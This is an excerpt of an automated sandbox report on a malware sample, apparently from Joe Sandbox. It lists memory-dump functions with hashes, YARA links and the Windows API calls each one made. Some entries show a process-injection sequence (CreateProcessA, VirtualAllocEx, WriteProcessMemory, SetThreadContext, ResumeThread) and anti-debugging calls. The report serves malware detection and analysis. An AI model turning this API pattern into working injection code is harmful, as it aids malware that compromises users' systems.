Function 058E9708 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86ff9fc5bdf214b2b06458e9a19a10cedf62d8ff6cd6dfd02288907bc63506a
Instruction ID: 5fc4b0564f96f15273da4cd27376e65c0f31bbec007fb43f37a920dc4f9c0542
Opcode Fuzzy Hash: f86ff9fc5bdf214b2b06458e9a19a10cedf62d8ff6cd6dfd02288907bc63506a
Instruction Fuzzy Hash: 23F089363002196F8F059E98AC459AF7FABEFC8250B004429FA05D7351DF725D2197A5

Function 01242010 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254b0b21e09e65864e45b7316e8fabd7b4231fb66ffb33360132dd2af193446d
Instruction ID: b2ae8b21488cb1cc57d75cfded07e4b3e9dc614a66eef57a81d6104239e22351
Opcode Fuzzy Hash: 254b0b21e09e65864e45b7316e8fabd7b4231fb66ffb33360132dd2af193446d
Instruction Fuzzy Hash: 8CE09236D263968BCB02977098044EEBF34EEA3215B14429BD061A7053F771160EC761

Function 01242020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3b57abef0c4331719ccb811b6bce1f305db714f7cd0ab2885246c730ce2da2
Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
Opcode Fuzzy Hash: 9d3b57abef0c4331719ccb811b6bce1f305db714f7cd0ab2885246c730ce2da2
Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1

Function 01248258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 2845ecf4d62f7cb672440ddc997e7aa8836816591722c555b7e5dcf7bd02302e
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 0BC0123322C5282BA629508E7C41AA3AB8CC2C12F4A250137FA1CA3200A8829C8001A8

Function 0124A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a565c4cf9c32fa3e2aaf05ecb861b49144743ef9cf262a1e6f67d7a894b6d2
Instruction ID: cbf68732b8de46f99e3aeb958ef5bc2e12db31325e90bc1c32659783033e64b8
Opcode Fuzzy Hash: f4a565c4cf9c32fa3e2aaf05ecb861b49144743ef9cf262a1e6f67d7a894b6d2
Instruction Fuzzy Hash: F6D0677AB010089FCB149F99E8449DDB7B6FB9C221B048116E915A3264C6369921DBA0

Function 0124F014 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668e32d687957cd63da676ef560895795efacaf23c186d7ee4a8d1ebb9d8b21d
Instruction ID: ea6a4724f3de8eebadd442a50679c0061c5b1330aea65e44691b768d140d039d
Opcode Fuzzy Hash: 668e32d687957cd63da676ef560895795efacaf23c186d7ee4a8d1ebb9d8b21d
Instruction Fuzzy Hash: A3D04234914118CBCF209F64EA49298B7B0AB95305F0054A6D909B2254DB305A908F11

Function 01245EA8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 628420f7948de217849c2e4d06554f98e62a3a8143e2386fb2c5c5f2d258c617
Instruction ID: ba3b3e48f75c215ca9d644a853e7fc87a13eb9b3b609e04ead7396a8c359128d
Opcode Fuzzy Hash: 628420f7948de217849c2e4d06554f98e62a3a8143e2386fb2c5c5f2d258c617
Instruction Fuzzy Hash: 9FD02B7590A3464FCB11F730E4440583B327AD1208B408196EC050A52FEA780D058712

Function 01245EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343411d53504de8eec136ccb79cc80b5df54c424f8bc1f4a7a337764a7b24e52
Instruction ID: 3fe995988d7e95c97f2644e52d81db45f5d8aa68c6ce405f638b10b30ce62ecd
Opcode Fuzzy Hash: 343411d53504de8eec136ccb79cc80b5df54c424f8bc1f4a7a337764a7b24e52
Instruction Fuzzy Hash: B3C0807510670F4FD501F775F945515375BB6C0605F40D510F4091B31DDF745E454792

Analysis Process: RePUtenbQjvc.exePID: 6768, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	260
Total number of Limit Nodes:	18

Executed Functions

Function 06D756B0 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 06D75737

Memory Dump Source

Source File: 00000009.00000002.1566831064.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d70000_RePUtenbQjvc.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e3cae68998d15b6b6fe982f5a0a085d159bfb67fd7aa0735a3e17fa5d7f9ef65
Instruction ID: 0d7de9d3e70b6facbeb551e9a42a2ca81c1e82459481826836d649402ac829f6
Opcode Fuzzy Hash: e3cae68998d15b6b6fe982f5a0a085d159bfb67fd7aa0735a3e17fa5d7f9ef65
Instruction Fuzzy Hash: 3E21D0B5D01359DFCB10DF9AD884ADEBBF4BB48310F10841AE958A7250D774A944CFA5

Function 06D71674 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 06D75737

Memory Dump Source

Source File: 00000009.00000002.1566831064.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d70000_RePUtenbQjvc.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 7376db5af1f01b36c9b4ddfcabc00995816bb29279d9c42b8901b13d15f52231
Instruction ID: b1828df46e99df7113a248e29aa6462125f14c9487b7deef2940244d328c499e
Opcode Fuzzy Hash: 7376db5af1f01b36c9b4ddfcabc00995816bb29279d9c42b8901b13d15f52231
Instruction Fuzzy Hash: 2021FEB5900349DFCB10CF9AD884ADEBBF4FB48310F10842AE918A7350D774A904CFA1

Function 00E9D6B8 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E9D746
GetCurrentThread.KERNEL32 ref: 00E9D783
GetCurrentProcess.KERNEL32 ref: 00E9D7C0
GetCurrentThreadId.KERNEL32 ref: 00E9D819

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c5356939ca530443c2a24d963f607f17c40e06775ecdafe11f52c34a29b6a000
Instruction ID: f7b4ea98b6d908102dfdc33015c9dbd3da0d3bb62c140482874a95be4db78232
Opcode Fuzzy Hash: c5356939ca530443c2a24d963f607f17c40e06775ecdafe11f52c34a29b6a000
Instruction Fuzzy Hash: C15147B09043498FDB14DFA9D948BAEBBF1BF88314F20845AE419B7390DB746944CB66

Function 00E9D6C8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E9D746
GetCurrentThread.KERNEL32 ref: 00E9D783
GetCurrentProcess.KERNEL32 ref: 00E9D7C0
GetCurrentThreadId.KERNEL32 ref: 00E9D819

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bd37ef5d1df36e87aa5fb892b2a3f13234bf7592942aa1d44bb89d07b7c87d4a
Instruction ID: d9fdb7d3ba803fad18d374401754feec9908652fdc28a528b64b7a366e604f81
Opcode Fuzzy Hash: bd37ef5d1df36e87aa5fb892b2a3f13234bf7592942aa1d44bb89d07b7c87d4a
Instruction Fuzzy Hash: 4A5126B09043498FDB14DFAAD948BAEBBF1BB88314F208459E419B73A0DB745944CF65

Function 02822C45 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02822E86

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3bbb46a026f3ea9867a2bee0aef1532c165c9df7dfa4cbac7595a23e06f3dccd
Instruction ID: 0446db6ae9b5619cda9f0e31e3046c9873688f4d97fe1356465baccbeb8970f7
Opcode Fuzzy Hash: 3bbb46a026f3ea9867a2bee0aef1532c165c9df7dfa4cbac7595a23e06f3dccd
Instruction Fuzzy Hash: A8A16B79D006299FEF20CF68C8417DEBBB2FB44314F14866AE808E7244DB749989CF91

Function 02822C50 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02822E86

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 43689035aaea2cbc2429abb69a6cc9da1a3a572ab2490c686201769de7a1d1c6
Instruction ID: 2019daa34d8d2edd9a6bb9ac59ad6196245f4d63d2d3ff0570a652d3e86d5945
Opcode Fuzzy Hash: 43689035aaea2cbc2429abb69a6cc9da1a3a572ab2490c686201769de7a1d1c6
Instruction Fuzzy Hash: 2B915A79D006298FEF20DF68C8417DDBBB2FB48314F1482AAE808E7254DB749985CF91

Function 00E9B017 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B27E

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0299e4971dd6ca7de7b6243bd0076f28f0670674b61bc94c77b6595e45976674
Instruction ID: 74078d34ada8a70be84ae3d651937ca149a919678c85c50fd42f216cd6039ead
Opcode Fuzzy Hash: 0299e4971dd6ca7de7b6243bd0076f28f0670674b61bc94c77b6595e45976674
Instruction Fuzzy Hash: 53813370A00B058FDB24DF2AE55579ABBF1FF88304F10892ED48AE7A50DB75A845CB91

Function 00E9590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E959C9

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 868d2812b634d2e77c9b1a841c17efb9fcb3f3f4d88b73074185e4d24fd3b88b
Instruction ID: a1de2442bb61c47f131ba852a474cf8b10674963c4cc67d6b5ee0ea60b488453
Opcode Fuzzy Hash: 868d2812b634d2e77c9b1a841c17efb9fcb3f3f4d88b73074185e4d24fd3b88b
Instruction Fuzzy Hash: 8241EFB1C00719CFEF25DFA9C88479EBBB6BF88714F20816AD409AB251DB715946CF50

Function 00E944D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E959C9

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f014efad26dc0948092e4f9e8b2d61b311a582f23b323f4fa0cf3ff357f095dd
Instruction ID: aaf88934830fda3e5821cc20cfab749315ed7a7cc70f38237ed8885f52f5c0a2
Opcode Fuzzy Hash: f014efad26dc0948092e4f9e8b2d61b311a582f23b323f4fa0cf3ff357f095dd
Instruction Fuzzy Hash: B441E071C00719CFEB24DFA9C88478EBBF5BF88714F20816AD409AB251DBB16945CF90

Function 02820C21 Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0689f459791a6cefe7ddf8619bc51402b551b41a0a17a401a448ef93b770b9
Instruction ID: e9b357778d1cef58465319958f6da6b66d1ba54368f0248f0d450d377ba22772
Opcode Fuzzy Hash: 7b0689f459791a6cefe7ddf8619bc51402b551b41a0a17a401a448ef93b770b9
Instruction Fuzzy Hash: 4C31C07580A3E89FDB12DF68C8646DABFF4AF86210F054087D094EB192D378594CCBB6

Function 02820D11 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc2ec5192810fdf90bc2c0640b22b423adcfe7b25dbb086d45f92a3e0c2fa14
Instruction ID: 8a64f9b9f6e36b2faaf40dd58cde9edc04cfe618b57ed9d86188d9a63595f47d
Opcode Fuzzy Hash: 0cc2ec5192810fdf90bc2c0640b22b423adcfe7b25dbb086d45f92a3e0c2fa14
Instruction Fuzzy Hash: 953134BA8093989FD7128F69C844BCABFF4EB59214F04408BD494EB242C3346548CBA2

Function 028229C1 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02822A58

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a1bc510cbc0664bb02af27af9282d2532fb8cd400403d3f39d9760c1bb3c877a
Instruction ID: 4eb69609573297fdcca265d16bf7c3e6640877faba3c9e6bd1b233161719eb93
Opcode Fuzzy Hash: a1bc510cbc0664bb02af27af9282d2532fb8cd400403d3f39d9760c1bb3c877a
Instruction Fuzzy Hash: ED2157759003599FDF10DFAAC885BDEBBF5FF88310F10842AE919A7240D7789955CBA0

Function 02822828 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 028228AE

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7d971411c0a6741920d99bab4b3a6419e16b96c100d8ee0e0d79ca11034cf134
Instruction ID: 4ea0f70727e5ddd1a06e0ff11af71a8e002a70cbab099cf8f61b795fe01c4ac6
Opcode Fuzzy Hash: 7d971411c0a6741920d99bab4b3a6419e16b96c100d8ee0e0d79ca11034cf134
Instruction Fuzzy Hash: A5215775D003099FDB14DFAAC8857EEBBF4AF88214F10842AD919A7240DB789985CFA1

Function 028229C8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02822A58

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 87f0826628c5d296ce01c741224507cdf7443b328ed9460fbd1dfb8dedce39e8
Instruction ID: 96a17d166c10248b73c441681321c7dc098cf1432e41e78e38fed51dded362e2
Opcode Fuzzy Hash: 87f0826628c5d296ce01c741224507cdf7443b328ed9460fbd1dfb8dedce39e8
Instruction Fuzzy Hash: D72136759003599FDF10DFAAC885BEEBBF5FF48310F10842AE919A7240C7789954CBA0

Function 02822AB1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02822B38

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 66325d165cf2a038210155a08606b02905d537b9a80586098ba314285dd3caaa
Instruction ID: d75fba3f5caf0752078a602de054f6268a97d114d9ab61231f4ccfd56c0e3d70
Opcode Fuzzy Hash: 66325d165cf2a038210155a08606b02905d537b9a80586098ba314285dd3caaa
Instruction Fuzzy Hash: 502136758003599FDF10DFAAC880BDEBBF5FF48320F508429E918A7240DB799545CBA0

Function 00E9D909 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D997

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 541e45c353ec2e6d7e512ee2b8868202fb04618e6e5f21ab2bf6480c60553ad5
Instruction ID: 11b28142124a87b157fe0b5d92ac3d3c3f05b648e1f7e88f97d21b9103f5fb04
Opcode Fuzzy Hash: 541e45c353ec2e6d7e512ee2b8868202fb04618e6e5f21ab2bf6480c60553ad5
Instruction Fuzzy Hash: DD2114B5C00319AFDB10CFAAD884ADEBBF8FB48320F14841AE914A7350C374A940CFA0

Function 02822AB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02822B38

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b762454baba79a28896c380a37d16cc7018e127f58249f1b050d3344089b46a9
Instruction ID: 7143ff68a18c5d69136696bb3f01cf6335983e0d3c129579b1463245e4318462
Opcode Fuzzy Hash: b762454baba79a28896c380a37d16cc7018e127f58249f1b050d3344089b46a9
Instruction Fuzzy Hash: D72125758003599FDB10DFAAC880BEEFBF5FF48310F50842AE919A7240CB789945CBA0

Function 02822830 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 028228AE

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 72cfc82298202162632fb60bca9666c7857ec16d55f37a8042611b1d85e18be1
Instruction ID: c82c523d787363b2466ab6e48e930ad90eee7dcdf01bc58918851b0899b82a53
Opcode Fuzzy Hash: 72cfc82298202162632fb60bca9666c7857ec16d55f37a8042611b1d85e18be1
Instruction Fuzzy Hash: 0C213875D003098FDB14DFAAC4857AEBBF4BF88214F148429D959A7240CB789945CFA0

Function 00E9D910 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D997

Memory Dump Source

Source File: 00000009.00000002.1561145496.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e90000_RePUtenbQjvc.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7b0b5a20ddd16822d3f8105cdc5b5e80e6b21266c0e910f21ac1d261ede68abe
Instruction ID: fc25bd3d2edb2170dc5ea75c19a6036bc0c13bf052707f81eff2b866b90a0897
Opcode Fuzzy Hash: 7b0b5a20ddd16822d3f8105cdc5b5e80e6b21266c0e910f21ac1d261ede68abe
Instruction Fuzzy Hash: D221F5B5900359AFDB10DFAAD884ADEFBF8FB48310F14841AE954A7350D374A940CFA5

Function 02822901 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02822976

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5a40383f83c78aa7faad6c029c483781ff6edfca897620ab8fe77a072a7b6014
Instruction ID: 90c31131cc1b433a34b559f066360861b2c87e02a03d92f6f9247942b6abd9dd
Opcode Fuzzy Hash: 5a40383f83c78aa7faad6c029c483781ff6edfca897620ab8fe77a072a7b6014
Instruction Fuzzy Hash: B61144768003499FDB20DFAAC845BEFBFF5AB88320F148819E959A7250CB759544CFA1

Function 02822778 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 028227E2

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f1979f9351d644914327c2752546bf5249fd654b9c7c9512e077ffee3bfdc807
Instruction ID: 8e41bf99b7bce5c574380a5393128d517023626102d80d31e293ade573a6893a
Opcode Fuzzy Hash: f1979f9351d644914327c2752546bf5249fd654b9c7c9512e077ffee3bfdc807
Instruction Fuzzy Hash: E21158759003498FDB20DFAAC8457DFFBF9AB88620F20882AD529A7240CB756545CBA1

Function 06D76A88 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 06D76B00

Memory Dump Source

Source File: 00000009.00000002.1566831064.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d70000_RePUtenbQjvc.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: c927241db4f9e8919f768b9deb8df8cfbe8dacdf6e5ba557df1bb6d4c6bbb43e
Instruction ID: 3e9fa8d273e4baa779d6dd83e3f9f1b0f9dfdee871fc2ebfbf9ebeb2ea60bfd8
Opcode Fuzzy Hash: c927241db4f9e8919f768b9deb8df8cfbe8dacdf6e5ba557df1bb6d4c6bbb43e
Instruction Fuzzy Hash: 9111E2B5C0065A9BCB14DF9AD845BDEFBF4FB88720F10812AE818A7240E774A545CFA5

Function 02822908 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02822976

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2820000_RePUtenbQjvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3ef61ae75af9de84dfb3c0ef9617b69774d3b49cef0d0bbe5e85ab5a6b432d8a
Instruction ID: ca2ecaa7cfdbd24c3192fbc289e08e1498fa1c268b10be56ee7663e84d88cd98
Opcode Fuzzy Hash: 3ef61ae75af9de84dfb3c0ef9617b69774d3b49cef0d0bbe5e85ab5a6b432d8a
Instruction Fuzzy Hash: 301126759003499FDB20DFAAC844BDEBBF5BF88320F148819E959A7250CB759544CFA0

Function 06D75D94 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 06D76B00

Memory Dump Source

Source File: 00000009.00000002.1566831064.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d70000_RePUtenbQjvc.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 01d25097aba7b9fb53456b1677f3534ea00e9fbfed9ff18d730202eb8325f8c1
Instruction ID: 6f54c237fb3ba68d35b624039c85e33b5b8d9d41ba184323994a4c306637cfce
Opcode Fuzzy Hash: 01d25097aba7b9fb53456b1677f3534ea00e9fbfed9ff18d730202eb8325f8c1
Instruction Fuzzy Hash: E311F6B1D0065A9FCB14DF9AD445B9EFBF4FB48710F10811AE819A7340E774A944CFA5

Function 028261A8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0282620D

Memory Dump Source

Source File: 00000009.00000002.1561849920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

